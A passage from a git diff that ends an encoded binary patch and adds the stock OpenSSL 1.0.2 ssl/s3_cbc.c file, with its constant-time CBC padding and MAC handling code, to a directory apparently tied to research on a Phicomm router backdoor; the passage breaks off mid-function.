zLvP=ISB-XK!tC(16kbyo#?6I+5&@5rKCP0Bp&?;dDeD->Xz$r<To~C7EL+LY9mp?j
zp$;aDGw9;+i&ZyWmexte8*Qz`Y)%s6ZF6-8NpI*Po}`yLXPneel?vwvGm`$!A`QY5
zNs@G~%Q#1jKM_yHVlpEg^=Gw6!u;X^uyF+Q+5$md5j7)SC=oSYjT^r=>yF`!<T?vM
z_9k1>#nSf=B2fC}CMvUWV!mrfSM6CN(h)9B`?o<_57}P_+5T6nw5EP1sVcl16oJED
zVtyqL8i?^T31Vxm220NqGk*%Og!xG?88RP&#YfFSwUn$eju(nmdoClt`4oz^xUMA9
zXA;I+3F8%Gug?P$559l`7Y{vne}&)^1TC&#YJ8xYWo`5+lpSh-Z^6pFr3b{x(BA5b
zDS2XyT|7k0LLM0R9cYJ%iRKxKhGC+tqK)MgJ&F@%%$qP?9bJeTj0<eBrQ~4L=p#5e
z4Z<8cu+iF#(kCRjbY_zkSZON`?ergM1h!$+NMlU&zxp6;6(6htgc#9)H(bPECx#M%
zic+#ezb{ZBRPEVBb3g;BkDkKJYD-2QgC-U(hEI>~hu$&NNh39a$7Z}5xDx5FJq(c^
z+e<|NO&EWU*Pl?Aj10hFR@r4J`$za9=KbxEqJ<z2F`$a!lq?x}q?}|ON<IN!m`^`=
zcsFcgE}`$mHT;)^qP1BPN@i-h@jq!|8NFH)W|VIIiK<c9cbHMSDh&9RfVYd(Ev8ve
z=TMmFCwx=q0uBP6M>w@+qxS{DMaG&tzzM<FK<Mrmzxka~2@g0_$G6Mnlo+qFEo3&T
zdeK9SiU2hw8O3lh2GPyI0fuw7ATW9jb?{Hq{6k3(sr>~p76gd#BVyi@B+s4m5s&2E
z=Oa+7VC3DGbYXX2(hVCbKu`kJ88B-dQ`otd0eWb`3E}}hGeH->;Ht%2Th^)w#!s<y
zy+rqH!uT;Pv6`5l$%B^(+_d_UqmVg4mB;e51O3A3!CUJ09RwIQ%^Lt%+wF7Eb8gkI
zLOO`q2EolA0RAx#hBj&_aK_epjaUcKpRXWBTl++k7NiWOA95j$LPnwX40<O#F5pVH
zb?BEpyO-g~j2f?lz0pO$fKj`Ua9u7Xy9>qLzZr|wpsQo}C6EK-9|z<5{mTWZ>gh^t
z<DR0{Cgpd#1Z@=n&2AV+VC)gJk3o&WiaQqTppuZTAyX5iHPR7uBW{eBo;nDfgz?W2
zG#f6JUX(UTo5#CKr4pw1{NOyP{$y3*!j)2qn2+Rv$M`hHCsy_JP8YQnf9@|n^4uA3
zeBKK<_CTAcR|DSMk`XjLYXm<G6XR(JNlRf;{V<%`WPIq}3U*$#o2bl4B`}T74E^{D
z8pc8%rV_?s3_Ju5iaLh9(Q7YLFGA>J?abkX+1F0ev5tiK1Pa7!Pr%Lhz+D)6j5-*L
z8n4i()0m&5F^6m7!0zj2#C`lUSar2^OgxJ=(O!P}LM@&!zl!d}^`n6&F+b{^sFm&B
z$ynT{&Ld_fX(rnzDxuS8CP{o~f51BH7vS2Fj6H#eLDGcnU|bkVR#@uU)yXo5w|%YU
za!WE?g3J*!4i&elVm-~Al}E^J=|x#;w{{~gdg47Z>IU0EaAiZOsGctTtkT0#c@wI^
zMXUy-Fsa=@jQaxC6;4d(ffvL$S+xfjY{nqBuj!ZOs{PVYtWEkQRZTbC3M)}pHLS&^
zx#1RUNJA?&5-F6lxsv{q(!>h=(qgr;0n?%VjTnEE=mDhpuNpby%`S%TdD2nbqgmg?
zPo$%Bp*JyCI*NOO6kgWEi3(I?mqV<3QSQk?hBjO|5=378a%krQGBgMJLe*$=`4zfS
zc+D7Zuc7uDN>{+Qh45N=7MUyzU!K~WXWxYyOg)c{e&p}a2wLByegJ0u+C1{$$%q7Q
zT|1WlE6e~0&x4bZ2T|r3thC0tQ3TH}nuNnsC~7xa`&t5Q^vm!yT~fluiCc;J#XNw-
z_%s?K#y2lv!>pTm3ygHr+hEh?t>xE2moS2hX|UEYB2rCe9vUi6^kFZ0rgfV-0(vn?
zhI-weN&Qh6d9^t(x*i^UbQR%A<J{TSH?Lm865yS&g!fG?;hR2~gO#9_84lALJhi7_
zPhUs(6?GXNUyl^4o-X3fq^o1anwa}g4=J2hm(i=rd<fNtCy99s!+h5D1{NnPO=Eew
zGJB<)k5lswbu^Zs?hd97BTZ9fYy9p-UL#GsQ)8}9?i^6NgK441zoNk(Tc4C$q;|O_
zD!0Zr#emyEq0rK$OY7>E-Uj~xB|}KJhC;V2T^a-m;TKOeLUSbYQGZQar`E4({`z2D
zFmzk^PK^%34=f7>L$}vjFtvnd#RnhEd-JL`{K-;842~Ejd}$%MKDAbG4f<R+EU5H8
zgkc42F`W?ve7*`zqHoB3w^+U36Bqq^E8=2}J|`iD+}eDxCMx<Ru^Kp<L~raGNvx4L
zKoD*R@ouK;ai(j(dzDzd*K@b%*DKsT^Tlc+`r;@Z6{{tx$dWtA<Y>E6^zC;8!(I;<
z0J%?!HE}T%6>C<C{+4OE4v_gBlapaB0?2*d-6U3j&eJ6Nhbo%Hn*DPmF|>DXR9voC
zHi?a%Wv=<+a)7{hU;$QZF-@?T<&mpkP#J;`-a1Ib%*K9q0)2yM=oL{h<ax|R!(cCm
z<^eB!q*|+?G2X+lUmz9}eY(3@^t+FXK1uX;0Cb4W--$_ctR;qP0b^_}&0^Byb&2h(
z#g0{CdlQVl1EYJyj+Jz@eYQmkw}M*yp^Nk*{GxG&jIy;fLz)kZ{;AC1ep=4>{m2g#
zfKP&9rx1X3>~(_<9pmAChGqxWgM2FE``*=jhipFFmtSUlw;>-9{avD0sD|zj7`__u
zc8pg>^h(F++>2~(?bKY3&f#!2!q8R-ua{<<^U&gb^^9lg^vs;|fTr2VLr>q#8GIDG
zIsNpE0d@n!?eXJG40GfX@V>JsY<Hmba5x78?&XJ5eUC72s?T>k0{+^XNgts@tR6Gz
zE;^huiv;?E_wh_>gdy%5C#?ryHoUV8-d_g45Af?CLhIRCIS6B<&%$Rm{a-4Be+zKb
zGs*PO`T^Kz8Gd~HA%7bysI(RU_Hr5i@iO>ZW$;SyV>bV*0Y|$cOO0Jm?qK+x45u{(
zbSKK_!S$gYFWXwQ#sELosoCu6jQ`_o3(<N3{9h=;|9Bbvhh^}SO#eK#75$(a>1Br3
zGMv^J!2eN3&lSf1I^(Cc2KX02eZciTfd>$X))r`M8UAyI)7k=fgyA<WKyE>xbp<=q
z7yY)ZqV)FURJo@=r({)OYOD;Z*;HB;BCQ+NMM!X2oe)e!LiiOH<mSZcCMhAWUb(V0
zwoYCrH6>!Q5Lvr1xo)-GJCNRC_febO?@RT<l#t8y*2!H1^3H6Js#qi1l{<H-O3nhd
z_4N1Ty5+tUW6vr5U9tr#UBc>&(%;&ei1sk??TR`*8C$zn&S<KvWU~X=Dbq?{x-Vnt
zrn*wSxK>%tsj2i1Io-WO-j?d=<rvc4ss8PXobJhVD_J?0QJ5zKnu^-fAP!=wo_>^(
zQ(avSs7^+&`jlKQwOtXK+E&Ufu@-rIc3`KR?p0Ej7}cWg$|yqn9ie(Ek<mJLD7&mN
zPWNo<NvBjrrd;?QOWqUPDATZ_;d_;A&$eB1syCJGvv_EDbBd~E<gAkFk~_6++mx&T
z@j~WY&j2-DCtEBm@)i##YDuwdWEJo@r&t-Y6;ft<hPQ;<3-3uJ*nR^3-hjW!P`U*{
zAiQa=g^!ItgdmWUAOFOK<m9){t&{(^7W-BFwQ!!0ocuwCJM~A(@T(mE^`Ou8AAeyW
zp&tB`gN^6WAP_eAd&S20b2uNLFEAYS;9J4wKh5#;dVbB}yq-Ul(en(e^QixQoc_1U
z;0uuv2phcHZGXZX&g)sja5T^Rxs}6tKRY=+{CdB{@$-7V&f&bCZ<o<?j>GZyfbGAF
z-7h$e|MX(xy&Uf6@GBh7^KWDK4(j3K@FaUeIPnu4{sB(^D;&=2d5JxNP!GSaKEUoT
z#QAk?;qU;b{{)ABki-AU;UD7go7ugCc|;aFKDRR*?bdQQDT5DlIKQrUIGopW4ZFXb
z`tRd#Ue93;ui^Zmf3<}%>RHO+-+(?6;@82)Uf12+`F%Hs`=O77alnsFy{u#7_Ivk`
z1GnFEe{|sX`>c_xGpNgchuL+;)^ER)_Br_NchZv%+<p%&U{2e5?03%!2X4Ptk`CN{
zuM9eH`(1L-f!ptrBM#htm%QY_?RSX~%<bw^Q=QPNS*z`~dvM33f-1a5gkV=nO$ouy
zTuumP2XKJw;b7Pv3c>V1U!T$sto;M35`;e)+(vJBHs0Q^1vA-!4BV@`Kn4{n-Ef(v
z`V^L+|FiLfJf>p$myV^d(Q1SYdxx<h<+c0RVvWVU*$5w=F5%$^I)#%!s0QuWzmTwY
zBH<ZEoRxEgC>?g#wQ;s>?4k8r8b<%CJpQgjo%nB8JlXbd=0WJ&_U*QjVQiaBai3xS
zqkf+J`~dm{KBz0?z^}#20?2-USfi`$uYn2M7n=v$6-=JTu<zte0fwdA>3<`W_rn}d
zcK&Q^7j#gkQ@(@ApLI+)<yDZKZT}Q;V*zzDhcTR3f^B(w|IB6^<p}#Rm1O%5-9gAH
nk9UQ0?*JqmV1KCF;_#ojgDjNrO*or;4g3EibjD{lPWgWWDky#I

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_cbc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_cbc.c
new file mode 100644
index 0000000..f31dc04
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_cbc.c
@@ -0,0 +1,795 @@
+/* ssl/s3_cbc.c */
+/* ====================================================================
+ * Copyright (c) 2012 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "../crypto/constant_time_locl.h"
+#include "ssl_locl.h"
+
+#include <openssl/md5.h>
+#include <openssl/sha.h>
+
+/*
+ * MAX_HASH_BIT_COUNT_BYTES is the maximum number of bytes in the hash's
+ * length field. (SHA-384/512 have 128-bit length.)
+ */
+#define MAX_HASH_BIT_COUNT_BYTES 16
+
+/*
+ * MAX_HASH_BLOCK_SIZE is the maximum hash block size that we'll support.
+ * Currently SHA-384/512 has a 128-byte block size and that's the largest
+ * supported by TLS.)
+ */
+#define MAX_HASH_BLOCK_SIZE 128
+
+/*-
+ * ssl3_cbc_remove_padding removes padding from the decrypted, SSLv3, CBC
+ * record in |rec| by updating |rec->length| in constant time.
+ *
+ * block_size: the block size of the cipher used to encrypt the record.
+ * returns:
+ *   0: (in non-constant time) if the record is publicly invalid.
+ *   1: if the padding was valid
+ *  -1: otherwise.
+ */
+int ssl3_cbc_remove_padding(const SSL *s,
+                            SSL3_RECORD *rec,
+                            unsigned block_size, unsigned mac_size)
+{
+    unsigned padding_length, good;
+    const unsigned overhead = 1 /* padding length byte */  + mac_size;
+
+    /*
+     * These lengths are all public so we can test them in non-constant time.
+     */
+    if (overhead > rec->length)
+        return 0;
+
+    padding_length = rec->data[rec->length - 1];
+    good = constant_time_ge(rec->length, padding_length + overhead);
+    /* SSLv3 requires that the padding is minimal. */
+    good &= constant_time_ge(block_size, padding_length + 1);
+    padding_length = good & (padding_length + 1);
+    rec->length -= padding_length;
+    rec->type |= padding_length << 8; /* kludge: pass padding length */
+    return constant_time_select_int(good, 1, -1);
+}
+
+/*-
+ * tls1_cbc_remove_padding removes the CBC padding from the decrypted, TLS, CBC
+ * record in |rec| in constant time and returns 1 if the padding is valid and
+ * -1 otherwise. It also removes any explicit IV from the start of the record
+ * without leaking any timing about whether there was enough space after the
+ * padding was removed.
+ *
+ * block_size: the block size of the cipher used to encrypt the record.
+ * returns:
+ *   0: (in non-constant time) if the record is publicly invalid.
+ *   1: if the padding was valid
+ *  -1: otherwise.
+ */
+int tls1_cbc_remove_padding(const SSL *s,
+                            SSL3_RECORD *rec,
+                            unsigned block_size, unsigned mac_size)
+{
+    unsigned padding_length, good, to_check, i;
+    const unsigned overhead = 1 /* padding length byte */  + mac_size;
+    /* Check if version requires explicit IV */
+    if (SSL_USE_EXPLICIT_IV(s)) {
+        /*
+         * These lengths are all public so we can test them in non-constant
+         * time.
+         */
+        if (overhead + block_size > rec->length)
+            return 0;
+        /* We can now safely skip explicit IV */
+        rec->data += block_size;
+        rec->input += block_size;
+        rec->length -= block_size;
+    } else if (overhead > rec->length)
+        return 0;
+
+    padding_length = rec->data[rec->length - 1];
+
+    /*
+     * NB: if compression is in operation the first packet may not be of even
+     * length so the padding bug check cannot be performed. This bug
+     * workaround has been around since SSLeay so hopefully it is either
+     * fixed now or no buggy implementation supports compression [steve]
+     */
+    if ((s->options & SSL_OP_TLS_BLOCK_PADDING_BUG) && !s->expand) {
+        /* First packet is even in size, so check */
+        if ((memcmp(s->s3->read_sequence, "\0\0\0\0\0\0\0\0", 8) == 0) &&
+            !(padding_length & 1)) {
+            s->s3->flags |= TLS1_FLAGS_TLS_PADDING_BUG;
+        }
+        if ((s->s3->flags & TLS1_FLAGS_TLS_PADDING_BUG) && padding_length > 0) {
+            padding_length--;
+        }
+    }
+
+    if (EVP_CIPHER_flags(s->enc_read_ctx->cipher) & EVP_CIPH_FLAG_AEAD_CIPHER) {
+        /* padding is already verified */
+        rec->length -= padding_length + 1;
+        return 1;
+    }
+
+    good = constant_time_ge(rec->length, overhead + padding_length);
+    /*
+     * The padding consists of a length byte at the end of the record and
+     * then that many bytes of padding, all with the same value as the length
+     * byte. Thus, with the length byte included, there are i+1 bytes of
+     * padding. We can't check just |padding_length+1| bytes because that
+     * leaks decrypted information. Therefore we always have to check the
+     * maximum amount of padding possible. (Again, the length of the record
+     * is public information so we can use it.)
+     */
+    to_check = 255;             /* maximum amount of padding. */
+    if (to_check > rec->length - 1)
+        to_check = rec->length - 1;
+
+    for (i = 0; i < to_check; i++) {
+        unsigned char mask = constant_time_ge_8(padding_length, i);
+        unsigned char b = rec->data[rec->length - 1 - i];
+        /*
+         * The final |padding_length+1| bytes should all have the value
+         * |padding_length|. Therefore the XOR should be zero.
+         */
+        good &= ~(mask & (padding_length ^ b));
+    }
+
+    /*
+     * If any of the final |padding_length+1| bytes had the wrong value, one
+     * or more of the lower eight bits of |good| will be cleared.
+     */
+    good = constant_time_eq(0xff, good & 0xff);
+    padding_length = good & (padding_length + 1);
+    rec->length -= padding_length;
+    rec->type |= padding_length << 8; /* kludge: pass padding length */
+
+    return constant_time_select_int(good, 1, -1);
+}
+
+/*-
+ * ssl3_cbc_copy_mac copies |md_size| bytes from the end of |rec| to |out| in
+ * constant time (independent of the concrete value of rec->length, which may
+ * vary within a 256-byte window).
+ *
+ * ssl3_cbc_remove_padding or tls1_cbc_remove_padding must be called prior to
+ * this function.
+ *
+ * On entry:
+ *   rec->orig_len >= md_size
+ *   md_size <= EVP_MAX_MD_SIZE
+ *
+ * If CBC_MAC_ROTATE_IN_PLACE is defined then the rotation is performed with
+ * variable accesses in a 64-byte-aligned buffer. Assuming that this fits into
+ * a single or pair of cache-lines, then the variable memory accesses don't
+ * actually affect the timing. CPUs with smaller cache-lines [if any] are
+ * not multi-core and are not considered vulnerable to cache-timing attacks.
+ */
+#define CBC_MAC_ROTATE_IN_PLACE
+
+void ssl3_cbc_copy_mac(unsigned char *out,
+                       const SSL3_RECORD *rec,
+                       unsigned md_size, unsigned orig_len)
+{
+#if defined(CBC_MAC_ROTATE_IN_PLACE)
+    unsigned char rotated_mac_buf[64 + EVP_MAX_MD_SIZE];
+    unsigned char *rotated_mac;
+#else
+    unsigned char rotated_mac[EVP_MAX_MD_SIZE];
+#endif
+
+    /*
+     * mac_end is the index of |rec->data| just after the end of the MAC.
+     */
+    unsigned mac_end = rec->length;
+    unsigned mac_start = mac_end - md_size;
+    /*
+     * scan_start contains the number of bytes that we can ignore because the
+     * MAC's position can only vary by 255 bytes.
+     */
+    unsigned scan_start = 0;
+    unsigned i, j;
+    unsigned div_spoiler;
+    unsigned rotate_offset;
+
+    OPENSSL_assert(orig_len >= md_size);
+    OPENSSL_assert(md_size <= EVP_MAX_MD_SIZE);
+
+#if defined(CBC_MAC_ROTATE_IN_PLACE)
+    rotated_mac = rotated_mac_buf + ((0 - (size_t)rotated_mac_buf) & 63);
+#endif
+
+    /* This information is public so it's safe to branch based on it. */
+    if (orig_len > md_size + 255 + 1)
+        scan_start = orig_len - (md_size + 255 + 1);
+    /*
+     * div_spoiler contains a multiple of md_size that is used to cause the
+     * modulo operation to be constant time. Without this, the time varies
+     * based on the amount of padding when running on Intel chips at least.
+     * The aim of right-shifting md_size is so that the compiler doesn't
+     * figure out that it can remove div_spoiler as that would require it to
+     * prove that md_size is always even, which I hope is beyond it.
+     */
+    div_spoiler = md_size >> 1;
+    div_spoiler <<= (sizeof(div_spoiler) - 1) * 8;
+    rotate_offset = (div_spoiler + mac_start - scan_start) % md_size;
+
+    memset(rotated_mac, 0, md_size);
+    for (i = scan_start, j = 0; i < orig_len; i++) {
+        unsigned char mac_started = constant_time_ge_8(i, mac_start);
+        unsigned char mac_ended = constant_time_ge_8(i, mac_end);
+        unsigned char b = rec->data[i];
+        rotated_mac[j++] |= b & mac_started & ~mac_ended;
+        j &= constant_time_lt(j, md_size);
+    }
+
+    /* Now rotate the MAC */
+#if defined(CBC_MAC_ROTATE_IN_PLACE)
+    j = 0;
+    for (i = 0; i < md_size; i++) {
+        /* in case cache-line is 32 bytes, touch second line */
+        ((volatile unsigned char *)rotated_mac)[rotate_offset ^ 32];
+        out[j++] = rotated_mac[rotate_offset++];
+        rotate_offset &= constant_time_lt(rotate_offset, md_size);
+    }
+#else
+    memset(out, 0, md_size);
+    rotate_offset = md_size - rotate_offset;
+    rotate_offset &= constant_time_lt(rotate_offset, md_size);
+    for (i = 0; i < md_size; i++) {
+        for (j = 0; j < md_size; j++)
+            out[j] |= rotated_mac[i] & constant_time_eq_8(j, rotate_offset);
+        rotate_offset++;
+        rotate_offset &= constant_time_lt(rotate_offset, md_size);
+    }
+#endif
+}
+
+/*
+ * u32toLE serialises an unsigned, 32-bit number (n) as four bytes at (p) in
+ * little-endian order. The value of p is advanced by four.
+ */
+#define u32toLE(n, p) \
+        (*((p)++)=(unsigned char)(n), \
+         *((p)++)=(unsigned char)(n>>8), \
+         *((p)++)=(unsigned char)(n>>16), \
+         *((p)++)=(unsigned char)(n>>24))
+
+/*
+ * These functions serialize the state of a hash and thus perform the
+ * standard "final" operation without adding the padding and length that such
+ * a function typically does.
+ */
+static void tls1_md5_final_raw(void *ctx, unsigned char *md_out)
+{
+    MD5_CTX *md5 = ctx;
+    u32toLE(md5->A, md_out);
+    u32toLE(md5->B, md_out);
+    u32toLE(md5->C, md_out);
+    u32toLE(md5->D, md_out);
+}
+
+static void tls1_sha1_final_raw(void *ctx, unsigned char *md_out)
+{
+    SHA_CTX *sha1 = ctx;
+    l2n(sha1->h0, md_out);
+    l2n(sha1->h1, md_out);
+    l2n(sha1->h2, md_out);
+    l2n(sha1->h3, md_out);
+    l2n(sha1->h4, md_out);
+}
+
+#define LARGEST_DIGEST_CTX SHA_CTX
+
+#ifndef OPENSSL_NO_SHA256
+static void tls1_sha256_final_raw(void *ctx, unsigned char *md_out)
+{
+    SHA256_CTX *sha256 = ctx;
+    unsigned i;
+
+    for (i = 0; i < 8; i++) {
+        l2n(sha256->h[i], md_out);
+    }
+}
+
+# undef  LARGEST_DIGEST_CTX
+# define LARGEST_DIGEST_CTX SHA256_CTX
+#endif
+
+#ifndef OPENSSL_NO_SHA512
+static void tls1_sha512_final_raw(void *ctx, unsigned char *md_out)
+{
+    SHA512_CTX *sha512 = ctx;
+    unsigned i;
+
+    for (i = 0; i < 8; i++) {
+        l2n8(sha512->h[i], md_out);
+    }
+}
+
+# undef  LARGEST_DIGEST_CTX
+# define LARGEST_DIGEST_CTX SHA512_CTX
+#endif
+
+/*
+ * ssl3_cbc_record_digest_supported returns 1 iff |ctx| uses a hash function
+ * which ssl3_cbc_digest_record supports.
+ */
+char ssl3_cbc_record_digest_supported(const EVP_MD_CTX *ctx)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return 0;
+#endif
+    switch (EVP_MD_CTX_type(ctx)) {
+    case NID_md5:
+    case NID_sha1:
+#ifndef OPENSSL_NO_SHA256
+    case NID_sha224:
+    case NID_sha256:
+#endif
+#ifndef OPENSSL_NO_SHA512
+    case NID_sha384:
+    case NID_sha512:
+#endif
+        return 1;
+    default:
+        return 0;
+    }
+}
+
+/*-
+ * ssl3_cbc_digest_record computes the MAC of a decrypted, padded SSLv3/TLS
+ * record.
+ *
+ *   ctx: the EVP_MD_CTX from which we take the hash function.
+ *     ssl3_cbc_record_digest_supported must return true for this EVP_MD_CTX.
+ *   md_out: the digest output. At most EVP_MAX_MD_SIZE bytes will be written.
+ *   md_out_size: if non-NULL, the number of output bytes is written here.
+ *   header: the 13-byte, TLS record header.
+ *   data: the record data itself, less any preceeding explicit IV.
+ *   data_plus_mac_size: the secret, reported length of the data and MAC
+ *     once the padding has been removed.
+ *   data_plus_mac_plus_padding_size: the public length of the whole
+ *     record, including padding.
+ *   is_sslv3: non-zero if we are to use SSLv3. Otherwise, TLS.
+ *
+ * On entry: by virtue of having been through one of the remove_padding
+ * functions, above, we know that data_plus_mac_size is large enough to contain
+ * a padding byte and MAC. (If the padding was invalid, it might contain the
+ * padding too. )
+ */
+void ssl3_cbc_digest_record(const EVP_MD_CTX *ctx,
+                            unsigned char *md_out,
+                            size_t *md_out_size,
+                            const unsigned char header[13],
+                            const unsigned char *data,
+                            size_t data_plus_mac_size,
+                            size_t data_plus_mac_plus_padding_size,
+                            const unsigned char *mac_secret,
+                            unsigned mac_secret_length, char is_sslv3)
+{
+    union {
+        double align;
+        unsigned char c[sizeof(LARGEST_DIGEST_CTX)];
+    } md_state;
+    void (*md_final_raw) (void *ctx, unsigned char *md_out);
+    void (*md_transform) (void *ctx, const unsigned char *block);
+    unsigned md_size, md_block_size = 64;
+    unsigned sslv3_pad_length = 40, header_length, variance_blocks,
+        len, max_mac_bytes, num_blocks,
+        num_starting_blocks, k, mac_end_offset, c, index_a, index_b;
+    unsigned int bits;          /* at most 18 bits */
+    unsigned char length_bytes[MAX_HASH_BIT_COUNT_BYTES];
+    /* hmac_pad is the masked HMAC key. */
+    unsigned char hmac_pad[MAX_HASH_BLOCK_SIZE];
+    unsigned char first_block[MAX_HASH_BLOCK_SIZE];
+    unsigned char mac_out[EVP_MAX_MD_SIZE];
+    unsigned i, j, md_out_size_u;
+    EVP_MD_CTX md_ctx;
+    /*
+     * mdLengthSize is the number of bytes in the length field that
+     * terminates * the hash.
+     */
+    unsigned md_length_size = 8;
+    char length_is_big_endian = 1;
+
+    /*
+     * This is a, hopefully redundant, check that allows us to forget about
+     * many possible overflows later in this function.
+     */
+    OPENSSL_assert(data_plus_mac_plus_padding_size < 1024 * 1024);
+
+    switch (EVP_MD_CTX_type(ctx)) {
+    case NID_md5:
+        MD5_Init((MD5_CTX *)md_state.c);
+        md_final_raw = tls1_md5_final_raw;
+        md_transform =
+            (void (*)(void *ctx, const unsigned char *block))MD5_Transform;
+        md_size = 16;
+        sslv3_pad_length = 48;
+        length_is_big_endian = 0;
+        break;
+    case NID_sha1:
+        SHA1_Init((SHA_CTX *)md_state.c);
+        md_final_raw = tls1_sha1_final_raw;
+        md_transform =
+            (void (*)(void *ctx, const unsigned char *block))SHA1_Transform;
+        md_size = 20;
+        break;
+#ifndef OPENSSL_NO_SHA256
+    case NID_sha224:
+        SHA224_Init((SHA256_CTX *)md_state.c);
+        md_final_raw = tls1_sha256_final_raw;
+        md_transform =
+            (void (*)(void *ctx, const unsigned char *block))SHA256_Transform;
+        md_size = 224 / 8;
+        break;
+    case NID_sha256:
+        SHA256_Init((SHA256_CTX *)md_state.c);
+        md_final_raw = tls1_sha256_final_raw;
+        md_transform =
+            (void (*)(void *ctx, const unsigned char *block))SHA256_Transform;
+        md_size = 32;
+        break;
+#endif
+#ifndef OPENSSL_NO_SHA512
+    case NID_sha384:
+        SHA384_Init((SHA512_CTX *)md_state.c);
+        md_final_raw = tls1_sha512_final_raw;
+        md_transform =
+            (void (*)(void *ctx, const unsigned char *block))SHA512_Transform;
+        md_size = 384 / 8;
+        md_block_size = 128;
+        md_length_size = 16;
+        break;
+    case NID_sha512:
+        SHA512_Init((SHA512_CTX *)md_state.c);
+        md_final_raw = tls1_sha512_final_raw;
+        md_transform =
+            (void (*)(void *ctx, const unsigned char *block))SHA512_Transform;
+        md_size = 64;
+        md_block_size = 128;
+        md_length_size = 16;
+        break;
+#endif
+    default:
+        /*
+         * ssl3_cbc_record_digest_supported should have been called first to
+         * check that the hash function is supported.
+         */
+        OPENSSL_assert(0);
+        if (md_out_size)
+            *md_out_size = -1;
+        return;
+    }
+
+    OPENSSL_assert(md_length_size <= MAX_HASH_BIT_COUNT_BYTES);
+    OPENSSL_assert(md_block_size <= MAX_HASH_BLOCK_SIZE);
+    OPENSSL_assert(md_size <= EVP_MAX_MD_SIZE);
+
+    header_length = 13;
+    if (is_sslv3) {
+        header_length = mac_secret_length + sslv3_pad_length + 8 /* sequence
+                                                                  * number */  +
+            1 /* record type */  +
+            2 /* record length */ ;
+    }
+
+    /*
+     * variance_blocks is the number of blocks of the hash that we have to
+     * calculate in constant time because they could be altered by the
+     * padding value. In SSLv3, the padding must be minimal so the end of
+     * the plaintext varies by, at most, 15+20 = 35 bytes. (We conservatively
+     * assume that the MAC size varies from 0..20 bytes.) In case the 9 bytes
+     * of hash termination (0x80 + 64-bit length) don't fit in the final
+     * block, we say that the final two blocks can vary based on the padding.
+     * TLSv1 has MACs up to 48 bytes long (SHA-384) and the padding is not
+     * required to be minimal. Therefore we say that the final six blocks can
+     * vary based on the padding. Later in the function, if the message is
+     * short and there obviously cannot be this many blocks then
+     * variance_blocks can be reduced.
+     */
+    variance_blocks = is_sslv3 ? 2 : 6;
+    /*
+     * From now on we're dealing with the MAC, which conceptually has 13
+     * bytes of `header' before the start of the data (TLS) or 71/75 bytes
+     * (SSLv3)
+     */
+    len = data_plus_mac_plus_padding_size + header_length;
+    /*
+     * max_mac_bytes contains the maximum bytes of bytes in the MAC,
+     * including * |header|, assuming that there's no padding.
+     */
+    max_mac_bytes = len - md_size - 1;
+    /* num_blocks is the maximum number of hash blocks. */
+    num_blocks =
+        (max_mac_bytes + 1 + md_length_size + md_block_size -
+         1) / md_block_size;
+    /*
+     * In order to calculate the MAC in constant time we have to handle the
+     * final blocks specially because the padding value could cause the end
+     * to appear somewhere in the final |variance_blocks| blocks and we can't
+     * leak where. However, |num_starting_blocks| worth of data can be hashed
+     * right away because no padding value can affect whether they are
+     * plaintext.
+     */
+    num_starting_blocks = 0;
+    /*
+     * k is the starting byte offset into the conceptual header||data where
+     * we start processing.
+     */
+    k = 0;
+    /*
+     * mac_end_offset is the index just past the end of the data to be MACed.
+     */
+    mac_end_offset = data_plus_mac_size + header_length - md_size;
+    /*
+     * c is the index of the 0x80 byte in the final hash block that contains
+     * application data.
+     */
+    c = mac_end_offset % md_block_size;
+    /*
+     * index_a is the hash block number that contains the 0x80 terminating
+     * value.
+     */
+    index_a = mac_end_offset / md_block_size;
+    /*
+     * index_b is the hash block number that contains the 64-bit hash length,
+     * in bits.
+     */
+    index_b = (mac_end_offset + md_length_size) / md_block_size;
+    /*
+     * bits is the hash-length in bits. It includes the additional hash block
+     * for the masked HMAC key, or whole of |header| in the case of SSLv3.
+     */
+
